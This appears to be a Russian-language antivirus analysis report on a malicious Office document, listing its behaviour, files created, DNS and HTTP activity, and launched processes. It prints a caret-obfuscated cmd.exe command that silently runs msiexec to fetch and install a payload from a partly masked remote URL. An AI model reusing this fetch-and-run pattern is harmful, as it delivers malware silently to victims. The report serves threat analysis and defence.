Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://la####dahotel.com/patios/download.php?fi############################################### /qn
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{bb0c6a49-32b5-448e-a47d-66b601cf2c28}.tmp
Сетевая активность
TCP
Запросы HTTP GET
- http://la####dahotel.com/patios/download.php?fi###############################################
UDP
- DNS ASK la####dahotel.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi5a98.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://la####dahotel.com/patios/download.php?fi############################################### /qn' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i http://la####dahotel.com/patios/download.php?fi############################################### /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
